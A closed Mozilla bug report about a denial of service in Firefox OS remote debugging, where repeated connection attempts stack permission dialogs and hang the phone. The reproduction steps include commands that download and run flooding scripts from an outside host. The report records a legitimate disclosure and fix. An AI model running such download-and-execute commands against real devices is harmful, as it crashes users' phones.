Closed Bug 1022692 Opened 10 years ago Closed 9 years ago

"Allow incoming connections" dialogs stack up and eventually hangs the phone.

Categories

(DevTools Graveyard :: WebIDE, defect)

Product:
DevTools Graveyard
Component:
WebIDE
Platform:
ARM
Gonk (Firefox OS)
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: jujjyl, Unassigned)

References

Details

(Keywords: csectype-dos) 

When initiating a DevTools connection to a phone, the dialog "Allow inbound remote debugging connection" pops up.

If another connection attempt is made and the user has not yet closed the previous dialog, these dialogs will start stacking up. Eventually the phone will hang and stop accepting debug connections and any other system dialogs will no longer open up either. E.g. pressing the power button will not show the "turn off/restart" options, but user must hard-reboot the phone by holding down the power button.

STR:
1. Have the device plugged in on USB, with ADB and DevTools options enabled.
2. Make sure the pref devtools.debugger.prompt-connection is in its default unset value (true)
3. Execute these on the command line

wget http://clb.demon.fi/bugs/ffdos/ffdb_dos.py
chmod +x ffdb_dos.py
wget http://clb.demon.fi/bugs/ffdos/ffdos.sh
chmod +x ffdos.sh
./ffdos.sh

The last line will start a barrage of incoming debug connection attempts. Wait some 10 minutes and try operating the phone.

While ffdos.sh is running, 'adb logcat' will start spamming

I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]
I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]
I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]
I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]
I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]
I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]

Expected: When a DevTools connection attempt is performed and the dialog is open, no other connection attempts are allowed until the user has acknowledged that dialog. All such attempts should effectively close the incoming socket connection immediately, instead of e.g. letting new inbound socket connections stack up.
I don't see any security issue here.
Group: core-security
Well, given that the whole dialog was implemented to provide a security barrier, I thought it is equally a security issue if one can use that barrier against its intent to crash the phone.
Sure, a Denial of Service is a type of security problem but usually not one we need to keep hidden.
Keywords: csectype-dos
As of bug 1127004, the dialogs no longer stack.  New connections are denied one if a different one is waiting on a prompt.
Status: NEW → RESOLVED
Closed: 9 years ago
Depends on: 1127004
Resolution: --- → FIXED
Product: Firefox → DevTools
Product: DevTools → DevTools Graveyard
You need to log in before you can comment on or make changes to this bug.